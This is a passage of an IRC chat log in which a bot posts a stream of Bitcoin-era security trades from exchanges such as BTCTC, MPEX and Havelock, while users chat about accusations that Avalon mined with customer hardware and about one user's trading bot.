BTC [+] Jun 17 18:23:51 [BTCTC] [TAT.ASICMINER] 10 @ 0.028987 = 0.2899 BTC [+] Jun 17 18:23:52 [BTCTC] [TAT.ASICMINER] 44 @ 0.028988 = 1.2755 BTC [+] Jun 17 18:23:53 [BTCTC] [TAT.ASICMINER] 10 @ 0.028988 = 0.2899 BTC [+] Jun 17 18:23:54 [BTCTC] [TAT.ASICMINER] 10 @ 0.028989 = 0.2899 BTC [+] Jun 17 18:23:55 [BTCTC] [TAT.ASICMINER] 34 @ 0.02899 = 0.9857 BTC [+] Jun 17 18:23:57 [BTCTC] [TAT.ASICMINER] 3 @ 0.02899 = 0.087 BTC [+] Jun 17 18:26:12 [BTCTC] [ASICMINER-PT] 1 @ 2.8 BTC [-] Jun 17 18:28:37 [BTCTC] [ASICMINER-PT] 1 @ 2.8599 BTC [+] Jun 17 18:29:02 [MPEX] [S.MPOE] 16254 @ 0.00065795 = 10.6943 BTC [-] Jun 17 18:29:10 [BTCTC] [DMS.MINING] 151 @ 0.0252 = 3.8052 BTC [-] Jun 17 18:29:37 [BTCTC] [DMS.PURCHASE] 100 @ 0.066149 = 6.6149 BTC [+] Jun 17 18:30:33 [BTCTC] [DMS.PURCHASE] 130 @ 0.066149 = 8.5994 BTC [+] Jun 17 18:30:37 [BTCTC] [ASICMINER-PT] 2 @ 2.86 = 5.72 BTC [+] Jun 17 18:33:01 [BTCTC] [DMS.MINING] 17 @ 0.0252 = 0.4284 BTC [-] Jun 17 18:33:02 [BTCTC] [DMS.MINING] 83 @ 0.0251 = 2.0833 BTC [-] Jun 17 18:34:02 [BTCTC] [BTC-BOND] 1 @ 0.009812 BTC [-] Jun 17 18:34:52 [BTCTC] [DMS.MINING] 17 @ 0.0251 = 0.4267 BTC [-] Jun 17 18:34:55 [BTCTC] [DMS.MINING] 23 @ 0.025 = 0.575 BTC [-] Jun 17 18:35:11 [BTCTC] [DMS.PURCHASE] 90 @ 0.066149 = 5.9534 BTC [+] Jun 17 18:35:12 [BTCTC] [TAT.ASICMINER] 7 @ 0.02899 = 0.2029 BTC [+] Jun 17 18:35:22 [BTCTC] [DMS.MINING] 12 @ 0.024 = 0.288 BTC [-] Jun 17 18:35:32 [BTCTC] [ASICMINER-PT] 5 @ 2.86 = 14.3 BTC [+] Jun 17 18:35:59 [BTCTC] [DMS.MINING] 78 @ 0.023518 = 1.8344 BTC [-] Jun 17 18:36:50 [BTCTC] [TAT.ASICMINER] 27 @ 0.029 = 0.783 BTC [+] Jun 17 18:37:25 [HAVELOCK] [ASICM] 7 @ 0.02869305 = 0.2009 BTC [-] Jun 17 18:37:27 [HAVELOCK] [ASICM] 15 @ 0.02869302 = 0.4304 BTC [-] Jun 17 18:37:28 [HAVELOCK] [ASICM] 278 @ 0.028692 = 7.9764 BTC [-] Jun 17 18:37:51 [BTCTC] [BTC-BOND] 5 @ 0.009812 = 0.0491 BTC [-] Jun 17 18:37:53 [BTCTC] [BTC-BOND] 40 @ 0.009811 = 0.3924 BTC [-] Jun 17 18:37:55 [BTCTC] [BTC-BOND] 10 @ 0.009804 = 0.098 BTC [-] Jun 17 18:38:37 [BTCTC] [DMS.SELLING] 10 @ 0.0455 = 0.455 BTC [-] Jun 17 18:39:09 [BTCTC] [ASICMINER-PT] 1 @ 2.86 BTC [+] Jun 17 18:39:31 [MPEX] [S.MPOE] 44478 @ 0.00065795 = 29.2643 BTC [-] Jun 17 18:39:37 [BTCTC] [ASICMINER-PT] 3 @ 2.86 = 8.58 BTC [+] Jun 17 18:39:52 [BTCTC] [ASICMINER-PT] 1 @ 2.86 BTC [+] Jun 17 18:41:08 [HAVELOCK] [ASICM] 2 @ 0.0295 = 0.059 BTC [+] Jun 17 18:41:28 [HAVELOCK] [ASICM] 18 @ 0.0295 = 0.531 BTC [+] Jun 17 18:41:38 [HAVELOCK] [ASICM] 1 @ 0.0295 BTC [+] Jun 17 18:42:02 [BITFUNDER] [TAT.VIRTUALMINE] [PAID] 123,635 @ 0.00003223 Jun 17 18:43:55 [BTCTC] [TAT.ASICMINER] 2 @ 0.029 = 0.058 BTC [+] Jun 17 18:48:37 [BTCTC] [DMS.MINING] 10 @ 0.025997 = 0.26 BTC [+] Jun 17 18:50:00 [BTCTC] [DMS.MINING] 17 @ 0.025996 = 0.4419 BTC [-] Jun 17 18:50:50 [BTCTC] [ASICMINER-PT] 3 @ 2.86 = 8.58 BTC [+] Jun 17 18:53:31 [BTCTC] [TAT.ASICMINER] 7 @ 0.029 = 0.203 BTC [+] Jun 17 18:54:28 [BTCTC] [ASICMINER-PT] 1 @ 2.88 BTC [+] Jun 17 18:55:10 [BTCTC] [DMS.SELLING] 1 @ 0.0455 BTC [-] Jun 17 18:55:48 [BTCTC] [DMS.SELLING] 1 @ 0.045899 BTC [+] Jun 17 18:56:27 [BTCTC] [DMS.SELLING] 3 @ 0.0459 = 0.1377 BTC [+] Jun 17 18:56:34 [BTCTC] [CRYPTO-TRADE] 9 @ 0.18 = 1.62 BTC [-] Jun 17 18:56:47 [BTCTC] [GSDPT] 4 @ 0.00262 = 0.0105 BTC [+] Jun 17 18:57:04 [BTCTC] [DMS.MINING] 1 @ 0.025999 BTC [+] Jun 17 18:57:48 [BTCTC] [DMS.MINING] 17 @ 0.023521 = 0.3999 BTC [-] Jun 17 18:57:50 [BTCTC] [DMS.MINING] 23 @ 0.02352 = 0.541 BTC [-] Jun 17 18:57:51 [BTCTC] [DMS.MINING] 50 @ 0.023518 = 1.1759 BTC [-] Jun 17 18:58:33 [BTCTC] [TAT.VIRTUALMINE] 7 @ 0.006898 = 0.0483 BTC [+] Jun 17 18:59:49 [MPEX] [S.MPOE] 5033 @ 0.00065942 = 3.3189 BTC [+] Jun 17 18:59:51 [MPEX] [S.MPOE] 5600 @ 0.00066247 = 3.7098 BTC [+] Jun 17 19:00:37 [HAVELOCK] [ASICM] 15 @ 0.0294 = 0.441 BTC [-] Jun 17 19:02:33 [BTCTC] [TAT.ASICMINER] 1 @ 0.0286 BTC [-] Jun 17 19:02:41 [BTCTC] [TAT.ASICMINER] 50 @ 0.028403 = 1.4202 BTC [-] Jun 17 19:02:47 [BTCTC] [TAT.ASICMINER] 33 @ 0.028402 = 0.9373 BTC [-] Jun 17 19:03:53 [BTCTC] [ASICMINER-PT] 1 @ 2.8799 BTC [-] Jun 17 19:04:29 [BTCTC] [ASICMINER-PT] 11 @ 2.88 = 31.68 BTC [+] Jun 17 19:04:30 [BTCTC] [DMS.MINING] 2 @ 0.025999 = 0.052 BTC [+] Jun 17 19:07:26 [HAVELOCK] [ASICM] 7 @ 0.02939999 = 0.2058 BTC [-] Jun 17 19:09:12 [BTCTC] [DMS.SELLING] 17 @ 0.0459 = 0.7803 BTC [+] Jun 17 19:10:10 [BTCTC] [DMS.SELLING] 26 @ 0.046 = 1.196 BTC [+] Jun 17 19:10:12 [BTCTC] [DMS.SELLING] 10 @ 0.046 = 0.46 BTC [+] Jun 17 19:10:14 [BTCTC] [DMS.SELLING] 20 @ 0.043001 = 0.86 BTC [-] Jun 17 19:10:27 [BTCTC] [DMS.SELLING] 45 @ 0.043 = 1.935 BTC [-] Jun 17 19:10:36 [BTCTC] [DMS.SELLING] 2 @ 0.042 = 0.084 BTC [-] Jun 17 19:10:41 [BTCTC] [DMS.SELLING] 2 @ 0.041 = 0.082 BTC [-] Jun 17 19:11:48 [BTCTC] [DMS.MINING] 2 @ 0.025997 = 0.052 BTC [-] Jun 17 19:12:21 [BTCTC] [ASICMINER-PT] 2 @ 2.8625 = 5.725 BTC [-] Jun 17 19:12:24 [BTCTC] [ASICMINER-PT] 1 @ 2.8601 BTC [-] Jun 17 19:12:26 [BTCTC] [ASICMINER-PT] 2 @ 2.86 = 5.72 BTC [-] Jun 17 19:12:37 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.006897 BTC [-] Jun 17 19:14:05 [HAVELOCK] [ASICM] 1 @ 0.02939999 BTC [-] Jun 17 19:14:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.028999 BTC [+] Jun 17 19:14:44 [BTCTC] [DMS.SELLING] 19 @ 0.039 = 0.741 BTC [-] Jun 17 19:15:52 [BTCTC] [DMS.PURCHASE] 11 @ 0.054609 = 0.6007 BTC [-] Jun 17 19:16:03 [BTCTC] [DMS.PURCHASE] 100 @ 0.054609 = 5.4609 BTC [-] Jun 17 19:16:16 [HAVELOCK] [ASICM] 2 @ 0.02939999 = 0.0588 BTC [-] Jun 17 19:16:22 those DMS are hot stuff Jun 17 19:16:43 [BTCTC] [DMS.PURCHASE] 30 @ 0.054609 = 1.6383 BTC [-] Jun 17 19:17:47 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.006897 = 0.0276 BTC [-] Jun 17 19:17:53 [BTCTC] [DMS.PURCHASE] 55 @ 0.054609 = 3.0035 BTC [-] Jun 17 19:18:02 "TRADING HAS BEEN HALTED ON DMS.PURCHASE BY THE ISSUER." Jun 17 19:18:17 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.006898 = 0.069 BTC [+] Jun 17 19:18:24 he's probly just running payouts Jun 17 19:19:21 ahh you're right Jun 17 19:20:29 [HAVELOCK] [ASICM] 41 @ 0.02939999 = 1.2054 BTC [-] Jun 17 19:20:31 [HAVELOCK] [ASICM] 24 @ 0.02939999 = 0.7056 BTC [-] Jun 17 19:22:19 [BTCTC] [DMS.MINING] 11 @ 0.024 = 0.264 BTC [-] Jun 17 19:22:49 [BTCTC] [DMS.SELLING] 7 @ 0.035001 = 0.245 BTC [-] Jun 17 19:22:51 [BTCTC] [DMS.SELLING] 4 @ 0.035 = 0.14 BTC [-] Jun 17 19:22:58 [BTCTC] [DMS.MINING] 6 @ 0.024 = 0.144 BTC [-] Jun 17 19:22:59 [BTCTC] [DMS.MINING] 2 @ 0.023519 = 0.047 BTC [-] Jun 17 19:23:01 [BTCTC] [DMS.MINING] 4 @ 0.023519 = 0.0941 BTC [-] Jun 17 19:23:02 [BTCTC] [DMS.MINING] 88 @ 0.023518 = 2.0696 BTC [-] Jun 17 19:23:24 YES! New drama: https://bitcointalk.org/index.php?topic=236348.msg2497439#msg2497439 Jun 17 19:23:24 [BTCTC] [DMS.SELLING] 7 @ 0.035001 = 0.245 BTC [+] Jun 17 19:23:25 [BTCTC] [DMS.SELLING] 24 @ 0.035 = 0.84 BTC [-] Jun 17 19:23:27 [BTCTC] [DMS.SELLING] 69 @ 0.034 = 2.346 BTC [-] Jun 17 19:23:32 [BTCTC] [DMS.PURCHASE] 11 @ 0.054608 = 0.6007 BTC [-] Jun 17 19:23:41 Avalon proven to be mining with customer units since April Jun 17 19:24:17 [MPEX] [S.MPOE] 17349 @ 0.00066513 = 11.5393 BTC [+] Jun 17 19:24:23 [BTCTC] [DMS.MINING] 30 @ 0.023518 = 0.7055 BTC [-] Jun 17 19:24:32 [BTCTC] [DMS.SELLING] 7 @ 0.034001 = 0.238 BTC [+] Jun 17 19:24:53 [BTCTC] [DMS.SELLING] 23 @ 0.034 = 0.782 BTC [-] Jun 17 19:25:11 [BTCTC] [DMS.SELLING] 55 @ 0.034 = 1.87 BTC [-] Jun 17 19:25:28 [BTCTC] [DMS.MINING] 4 @ 0.023518 = 0.0941 BTC [-] Jun 17 19:25:58 [BTCTC] [DMS.MINING] 10 @ 0.023515 = 0.2352 BTC [-] Jun 17 19:25:58 woohoo Jun 17 19:26:21 [BTCTC] [DMS.MINING] 5 @ 0.0235 = 0.1175 BTC [-] Jun 17 19:26:48 [HAVELOCK] [ASICM] 4 @ 0.029349 = 0.1174 BTC [-] Jun 17 19:26:53 wtb BFL proof too Jun 17 19:27:20 [BTCTC] [RSM] 5 @ 0.016 = 0.08 BTC [-] Jun 17 19:27:21 [HAVELOCK] [ASICM] 1 @ 0.029349 BTC [-] Jun 17 19:27:53 [BTCTC] [DMS.PURCHASE] 4 @ 0.054608 = 0.2184 BTC [-] Jun 17 19:27:55 [BTCTC] [DMS.PURCHASE] 50 @ 0.054608 = 2.7304 BTC [-] Jun 17 19:28:26 [BTCTC] [DMS.PURCHASE] 42 @ 0.054609 = 2.2936 BTC [+] Jun 17 19:29:06 [BTCTC] [DMS.PURCHASE] 160 @ 0.054609 = 8.7374 BTC [+] Jun 17 19:30:26 [HAVELOCK] [ASICM] 2 @ 0.0293 = 0.0586 BTC [-] Jun 17 19:33:29 [BTCTC] [TAT.ASICMINER] 49 @ 0.028997 = 1.4209 BTC [-] Jun 17 19:33:31 [BTCTC] [TAT.ASICMINER] 25 @ 0.028998 = 0.725 BTC [+] Jun 17 19:35:29 [BTCTC] [TAT.ASICMINER] 8 @ 0.028998 = 0.232 BTC [+] Jun 17 19:35:32 [BTCTC] [DMS.PURCHASE] 500 @ 0.054609 = 27.3045 BTC [+] Jun 17 19:35:53 [BTCTC] [DMS.PURCHASE] 150 @ 0.054609 = 8.1914 BTC [+] Jun 17 19:36:39 [BTCTC] [DMS.MINING] 2 @ 0.0231 = 0.0462 BTC [-] Jun 17 19:36:49 [BTCTC] [DMS.MINING] 10 @ 0.023 = 0.23 BTC [-] Jun 17 19:36:51 [BTCTC] [DMS.MINING] 2 @ 0.022001 = 0.044 BTC [-] Jun 17 19:36:52 [BTCTC] [DMS.MINING] 5 @ 0.022 = 0.11 BTC [-] Jun 17 19:36:55 [BTCTC] [DMS.MINING] 20 @ 0.022 = 0.44 BTC [-] Jun 17 19:36:57 [BTCTC] [DMS.MINING] 1 @ 0.021097 BTC [-] Jun 17 19:37:55 [BTCTC] [DMS.SELLING] 30 @ 0.0341 = 1.023 BTC [+] Jun 17 19:39:53 [BTCTC] [DMS.SELLING] 100 @ 0.033 = 3.3 BTC [-] Jun 17 19:40:12 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.00689 = 0.0689 BTC [-] Jun 17 19:40:13 [BTCTC] [TAT.VIRTUALMINE] 60 @ 0.006898 = 0.4139 BTC [+] Jun 17 19:40:13 DMS, stahp! Jun 17 19:40:19 [BTCTC] [DMS.MINING] 1 @ 0.023 BTC [+] Jun 17 19:41:16 [BTCTC] [ASICMINER-PT] 1 @ 2.886999 BTC [+] Jun 17 19:41:18 [BTCTC] [ASICMINER-PT] 2 @ 2.887 = 5.774 BTC [+] Jun 17 19:41:29 lol, good thread. 700BTC mined on his unit... usagi is at least pissed. I would be too if I'd paid for one with money from a year ago and then was dragged through the ASIC drama. Jun 17 19:42:44 yeah it's pretty hideous of Avalon Jun 17 19:44:42 lol Jun 17 19:44:48 "testing" for a few months Jun 17 19:45:12 they wanted to test how long a scammer can actually string someone along Jun 17 19:45:24 valuable data was gained. Jun 17 19:45:36 valuable hookers and blow were gained Jun 17 19:45:37 the answer is, aparently, for as long as they want. Jun 17 19:45:48 *apparently Jun 17 19:45:49 yep, but BFL already taught us that Jun 17 19:46:37 they dumb not to wipe that data before shipping. Jun 17 19:46:44 dingbats Jun 17 19:46:53 but then again, it's free advertising. Jun 17 19:47:23 so how could they scam these chip sales? Jun 17 19:47:31 other than never deliver Jun 17 19:48:26 they could use the money from selling chips to make even better chips and start hashing with or selling new hardware at the same time as all the buyers are getting their stale chips implemented Jun 17 19:50:08 [HAVELOCK] [ASICM] 35 @ 0.029299 = 1.0255 BTC [-] Jun 17 19:50:48 btw, has avalon actually responded to the claim? Jun 17 19:50:55 wait, thats usagi's box? Jun 17 19:51:17 i don't think they have too. there is no contract with that line item afaik Jun 17 19:51:35 i think they will though, for free adverts Jun 17 19:51:36 usagi is making the claim a) he owns an avalon, b) it was premined? Jun 17 19:51:58 not his, responding to OP of the thread. Jun 17 19:52:03 oh Jun 17 19:52:03 ThickAsThieves> YES! New drama: https://bitcointalk.org/index.php?topic=236348.msg2497439#msg2497439 Jun 17 19:52:49 its probably not true Jun 17 19:53:53 anyway to disprove the OP though? Jun 17 19:54:03 any way* Jun 17 19:54:36 yes, have op prove the box exists Jun 17 19:54:44 he can't prove that it did happen. Jun 17 19:54:53 he could have put all that in there. Jun 17 19:55:07 devils advovate here Jun 17 19:55:13 advocate* Jun 17 19:55:29 [BTCTC] [RSM] 9 @ 0.016 = 0.144 BTC [-] Jun 17 19:55:59 deadweasel: might be worthwhile, then, to pursue whether OP had anything to gain by lying Jun 17 19:56:25 an Epic Troll Award? Jun 17 19:56:35 [BTCTC] [ASICMINER-PT] 1 @ 2.8601 BTC [-] Jun 17 19:56:37 you get internet points for those, right? Jun 17 19:56:45 he's Russian Jun 17 19:56:49 bitfury? Jun 17 19:57:03 Russkaia internet points Jun 17 19:57:14 [BTCTC] [GSDPT] 99 @ 0.00251 = 0.2485 BTC [-] Jun 17 19:57:51 the guy is probably a bfl shill Jun 17 19:58:04 [BTCTC] [DMS.PURCHASE] 10 @ 0.054609 = 0.5461 BTC [+] Jun 17 19:59:36 [BTCTC] [DMS.SELLING] 2 @ 0.0345 = 0.069 BTC [+] Jun 17 19:59:44 there are posts from him talking about that his Avalon has finally shipped Jun 17 19:59:58 [MPEX] [S.MPOE] 2700 @ 0.00066873 = 1.8056 BTC [+] Jun 17 20:00:45 [BTCTC] [ASICMINER-PT] 10 @ 2.889 = 28.89 BTC [+] Jun 17 20:01:00 [BTCTC] [TAT.ASICMINER] 5 @ 0.029 = 0.145 BTC [+] Jun 17 20:01:22 [BTCTC] [ASICMINER-PT] 1 @ 2.898999 BTC [+] Jun 17 20:01:26 [BTCTC] [ASICMINER-PT] 7 @ 2.899 = 20.293 BTC [+] Jun 17 20:01:27 https://bitcointalk.org/index.php?topic=110584.msg2464248#msg2464248 "more units come in a few days, I can;t wait" June 13th Jun 17 20:01:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.028998 BTC [-] Jun 17 20:01:28 [BTCTC] [ASICMINER-PT] 2 @ 2.8995 = 5.799 BTC [+] Jun 17 20:01:35 [BTCTC] [DMS.MINING] 4 @ 0.021989 = 0.088 BTC [-] Jun 17 20:01:49 [BTCTC] [DMS.MINING] 13 @ 0.018125 = 0.2356 BTC [-] Jun 17 20:01:50 [BTCTC] [DMS.MINING] 4 @ 0.018124 = 0.0725 BTC [-] Jun 17 20:02:30 [BTCTC] [DMS.MINING] 140 @ 0.018125 = 2.5375 BTC [+] Jun 17 20:05:19 [BTCTC] [TAT.VIRTUALMINE] 72 @ 0.006898 = 0.4967 BTC [+] Jun 17 20:06:14 [BTCTC] [DMS.SELLING] 35 @ 0.0345 = 1.2075 BTC [+] Jun 17 20:06:17 [BTCTC] [DMS.SELLING] 59 @ 0.035 = 2.065 BTC [+] Jun 17 20:06:56 [BTCTC] [DMS.MINING] 3 @ 0.019999 = 0.06 BTC [+] Jun 17 20:10:11 [BTCTC] [GSDPT] 164 @ 0.002505 = 0.4108 BTC [-] Jun 17 20:10:46 [BTCTC] [GSDPT] 230 @ 0.0025 = 0.575 BTC [-] Jun 17 20:10:54 [BTCTC] [ASICMINER-PT] 12 @ 2.9 = 34.8 BTC [+] Jun 17 20:11:44 [MPEX] [S.MPOE] 25900 @ 0.00066873 = 17.3201 BTC [+] Jun 17 20:12:19 [BTCTC] [DMS.MINING] 4 @ 0.018126 = 0.0725 BTC [-] Jun 17 20:13:37 [BTCTC] [DMS.SELLING] 10 @ 0.034 = 0.34 BTC [-] Jun 17 20:14:37 [BTCTC] [B.YABMC] 5 @ 0.014247 = 0.0712 BTC [-] Jun 17 20:16:49 [BTCTC] [TAT.ASICMINER] 23 @ 0.029 = 0.667 BTC [+] Jun 17 20:22:05 [BTCTC] [TAT.ASICMINER] 1 @ 0.029 BTC [+] Jun 17 20:27:12 [BTCTC] [DMS.MINING] 3 @ 0.019994 = 0.06 BTC [+] Jun 17 20:28:29 [BTCTC] [DMS.MINING] 10 @ 0.019993 = 0.1999 BTC [-] Jun 17 20:28:31 [BTCTC] [DMS.MINING] 17 @ 0.019994 = 0.3399 BTC [+] Jun 17 20:28:32 [BTCTC] [DMS.MINING] 37 @ 0.02 = 0.74 BTC [+] Jun 17 20:28:33 [BTCTC] [DMS.MINING] 40 @ 0.0208 = 0.832 BTC [+] Jun 17 20:28:35 [BTCTC] [DMS.MINING] 1 @ 0.021987 BTC [+] Jun 17 20:28:35 [BTCTC] [DMS.MINING] 5 @ 0.02199 = 0.11 BTC [+] Jun 17 20:29:25 [BTCTC] [ASICMINER-PT] 1 @ 2.9 BTC [+] Jun 17 20:35:30 [BTCTC] [DMS.MINING] 1 @ 0.021989 BTC [-] Jun 17 20:35:52 [BTCTC] [DMS.MINING] 19 @ 0.02199 = 0.4178 BTC [+] Jun 17 20:36:06 [BTCTC] [ASICMINER-PT] 1 @ 2.9 BTC [+] Jun 17 20:36:57 [BTCTC] [TAT.ASICMINER] 131 @ 0.029 = 3.799 BTC [+] Jun 17 20:37:39 [BTCTC] [DMS.MINING] 11 @ 0.02 = 0.22 BTC [-] Jun 17 20:39:16 [BTCTC] [DMS.MINING] 2 @ 0.02199 = 0.044 BTC [+] Jun 17 20:40:19 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.006898 BTC [+] Jun 17 20:40:20 [BTCTC] [TAT.VIRTUALMINE] 34 @ 0.006899 = 0.2346 BTC [+] Jun 17 20:41:40 [BTCTC] [DMS.SELLING] 7 @ 0.035 = 0.245 BTC [+] Jun 17 20:42:08 [BTCTC] [ASICMINER-PT] 1 @ 2.8901 BTC [-] Jun 17 20:42:09 [BTCTC] [ASICMINER-PT] 9 @ 2.89 = 26.01 BTC [-] Jun 17 20:44:36 http://spy-coins.com/products.html Jun 17 20:44:46 essential "leave the country" gear Jun 17 20:47:33 [MPEX] [S.MPOE] 18350 @ 0.00066911 = 12.2782 BTC [+] Jun 17 20:47:35 [MPEX] [S.MPOE] 5350 @ 0.0006694 = 3.5813 BTC [+] Jun 17 20:48:38 [BTCTC] [ASICMINER-PT] 1 @ 2.87 BTC [-] Jun 17 20:50:26 neat Jun 17 20:52:02 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.006899 = 0.0138 BTC [+] Jun 17 20:57:29 i'd fear i will accidentally spend it :D Jun 17 20:57:47 who spends coins anymore? Jun 17 20:58:13 [BTCTC] [MININGCO.ETF] 1 @ 0.8 BTC [-] Jun 17 20:58:31 oh, what do you do instead? Jun 17 20:59:00 throw bills around with "oh, keep the change" Jun 17 20:59:34 yeah.. Jun 17 20:59:40 all change goes in tip jar Jun 17 20:59:51 i dont need jangly pockets Jun 17 20:59:59 [BTCTC] [TAT.VIRTUALMINE] 13 @ 0.006899 = 0.0897 BTC [+] Jun 17 21:00:39 [BTCTC] [TAT.ASICMINER] 5 @ 0.029 = 0.145 BTC [+] Jun 17 21:01:17 hm, I don't see my bot in here.. was it acting up? Jun 17 21:02:14 [BTCTC] [TAT.ASICMINER] 7 @ 0.0292 = 0.2044 BTC [+] Jun 17 21:03:02 [09:54] * coinflow (~coinflow@ool-457cead8.dyn.optonline.net) Quit (Ping timeout: 264 seconds) Jun 17 21:03:19 Oh good, it wasn't kicked for being irritating Jun 17 21:03:37 I was worried it started spewing exceptions to the channel, it shouldn't do that anymore Jun 17 21:03:48 [BTCTC] [BTC-TRADING-PT] 1 @ 0.3776 BTC [+] Jun 17 21:04:24 It would only occur that one time where I caught it quickly, I hope Jun 17 21:05:06 maybe it though DMS. was spamming Jun 17 21:05:10 :) Jun 17 21:06:40 ha, maybe.. hmm, I need to add some logic to it to detect that it's no longer in a channel Jun 17 21:07:26 [HAVELOCK] [ASICM] 44 @ 0.02910001 = 1.2804 BTC [-] Jun 17 21:07:27 [HAVELOCK] [ASICM] 4 @ 0.0291 = 0.1164 BTC [-] Jun 17 21:07:29 [HAVELOCK] [ASICM] 52 @ 0.029001 = 1.5081 BTC [-] Jun 17 21:07:31 [BTCTC] [MININGCO.ETF] 1 @ 0.8099 BTC [+] Jun 17 21:08:58 [BTCTC] [B.YABMC] 4 @ 0.014246 = 0.057 BTC [-] Jun 17 21:10:24 also add code for commentary Jun 17 21:10:41 TAT.ASICMINER just reached an all-time high, yowza! Jun 17 21:10:44 and such Jun 17 21:10:45 :) Jun 17 21:10:58 raise the rough Jun 17 21:11:01 *roof Jun 17 21:11:05 Yeah, good idea Jun 17 21:11:05 hehe Jun 17 21:11:15 i'm secretly buying up erupters on the cheap Jun 17 21:11:16 then people will think coinflow is a real person Jun 17 21:11:22 as long as i can pay with fiat Jun 17 21:11:27 way to keep a secret Jun 17 21:11:32 whoops Jun 17 21:11:35 hehe Jun 17 21:11:40 [BTCTC] [DMS.PURCHASE] 100 @ 0.054609 = 5.4609 BTC [+] Jun 17 21:11:47 [BTCTC] [DMS.PURCHASE] 100 @ 0.054609 = 5.4609 BTC [+] Jun 17 21:12:08 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.006899 BTC [+] Jun 17 21:13:05 "That's the lowest price SDICE has been at it months! Time to panic?" Jun 17 21:13:25 the coinflow stock troll Jun 17 21:14:09 [BTCTC] [ASICMINER-PT] 1 @ 2.87 BTC [-] Jun 17 21:16:06 [BTCTC] [DMS.MINING] 4 @ 0.02199 = 0.088 BTC [+] Jun 17 21:18:03 [MPEX] [S.MPOE] 2150 @ 0.0006694 = 1.4392 BTC [+] Jun 17 21:21:24 [BTCTC] [COGNITIVE] 4 @ 0.310029 = 1.2401 BTC [-] Jun 17 21:21:26 [BTCTC] [COGNITIVE] 1 @ 0.310028 BTC [-] Jun 17 21:21:31 [BTCTC] [COGNITIVE] 1 @ 0.31 BTC [-] Jun 17 21:21:32 [MPEX] [S.MPOE] 9246 @ 0.00067345 = 6.2267 BTC [+] Jun 17 21:34:49 [BTCTC] [DMS.MINING] 20 @ 0.021001 = 0.42 BTC [-] Jun 17 21:34:53 [BTCTC] [DMS.MINING] 1 @ 0.021 BTC [-] Jun 17 21:34:55 [BTCTC] [DMS.MINING] 2 @ 0.0201 = 0.0402 BTC [-] Jun 17 21:34:56 [BTCTC] [DMS.MINING] 6 @ 0.020003 = 0.12 BTC [-] Jun 17 21:34:57 [BTCTC] [DMS.MINING] 71 @ 0.020002 = 1.4201 BTC [-] Jun 17 21:36:50 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.006899 BTC [+] Jun 17 21:37:08 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.006899 BTC [+] Jun 17 21:37:35 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.006899 BTC [+] Jun 17 21:37:36 [BTCTC] [DMS.SELLING] 34 @ 0.035 = 1.19 BTC [+] Jun 17 21:37:37 [BTCTC] [DMS.SELLING] 16 @ 0.035999 = 0.576 BTC [+] Jun 17 21:39:42 [BTCTC] [ASICMINER-PT] 1 @ 2.8987 BTC [+] Jun 17 21:39:51 [BTCTC] [ASICMINER-PT] 2 @ 2.8988 = 5.7976 BTC [+] Jun 17 21:40:27 [HAVELOCK] [HIM] 35 @ 0.299 = 10.465 BTC [-] Jun 17 21:40:33 [BTCTC] [TAT.VIRTUALMINE] 8 @ 0.006899 = 0.0552 BTC [+] Jun 17 21:41:15 [BTCTC] [TAT.ASICMINER] 3 @ 0.0292 = 0.0876 BTC [+] Jun 17 21:41:31 [BTCTC] [B.YABMC] 5 @ 0.009551 = 0.0478 BTC [-] Jun 17 21:41:41 [BTCTC] [TAT.ASICMINER] 2 @ 0.02939 = 0.0588 BTC [+] Jun 17 21:42:02 [BTCTC] [TAT.ASICMINER] 5 @ 0.0294 = 0.147 BTC [+] Jun 17 21:42:50 [HAVELOCK] [ASICM] 2 @ 0.0291 = 0.0582 BTC [+] Jun 17 21:42:52 [HAVELOCK] [ASICM] 1 @ 0.029001 BTC [-] Jun 17 21:42:53 [HAVELOCK] [ASICM] 39 @ 0.029 = 1.131 BTC [-] Jun 17 21:42:54 [HAVELOCK] [ASICM] 3 @ 0.029 = 0.087 BTC [-] Jun 17 21:42:55 [HAVELOCK] [ASICM] 9 @ 0.02899999 = 0.261 BTC [-] Jun 17 21:42:56 [HAVELOCK] [ASICM] 20 @ 0.02870201 = 0.574 BTC [-] Jun 17 21:42:57 [HAVELOCK] [ASICM] 1 @ 0.028681 BTC [-] Jun 17 21:42:58 [HAVELOCK] [ASICM] 1 @ 0.02868065 BTC [-] Jun 17 21:42:59 [HAVELOCK] [ASICM] 103 @ 0.0286 = 2.9458 BTC [-] Jun 17 21:43:00 [HAVELOCK] [ASICM] 10 @ 0.0286 = 0.286 BTC [-] Jun 17 21:43:01 [HAVELOCK] [ASICM] 3 @ 0.0286 = 0.0858 BTC [-] Jun 17 21:43:02 [HAVELOCK] [ASICM] 4 @ 0.02854 = 0.1142 BTC [-] Jun 17 21:43:03 [HAVELOCK] [ASICM] 5 @ 0.02853012 = 0.1427 BTC [-] Jun 17 21:43:04 [HAVELOCK] [ASICM] 1 @ 0.02853001 BTC [-] Jun 17 21:43:05 [HAVELOCK] [ASICM] 1 @ 0.02853 BTC [-] Jun 17 21:43:06 [HAVELOCK] [ASICM] 47 @ 0.02851 = 1.34 BTC [-] Jun 17 21:44:57 [MPEX] [S.BBET] 3000 @ 0.00085 = 2.55 BTC [+] Jun 17 21:45:28 [BTCTC] [S.BBET-PT] 1 @ 0.00173 BTC [-] Jun 17 21:45:34 [BTCTC] [S.BBET-PT] 20 @ 0.00172 = 0.0344 BTC [-] Jun 17 21:45:52 [BTCTC] [S.BBET-PT] 1 @ 0.0017 BTC [-] Jun 17 21:46:00 [BTCTC] [S.BBET-PT] 10 @ 0.00166 = 0.0166 BTC [-] Jun 17 21:46:08 [BTCTC] [S.BBET-PT] 11 @ 0.00164 = 0.018 BTC [-] Jun 17 21:46:16 [BTCTC] [COGNITIVE] 1 @ 0.368993 BTC [+] Jun 17 21:46:20 [BTCTC] [S.BBET-PT] 10 @ 0.00162 = 0.0162 BTC [-] Jun 17 21:46:22 [BTCTC] [S.BBET-PT] 9 @ 0.0016 = 0.0144 BTC [-] Jun 17 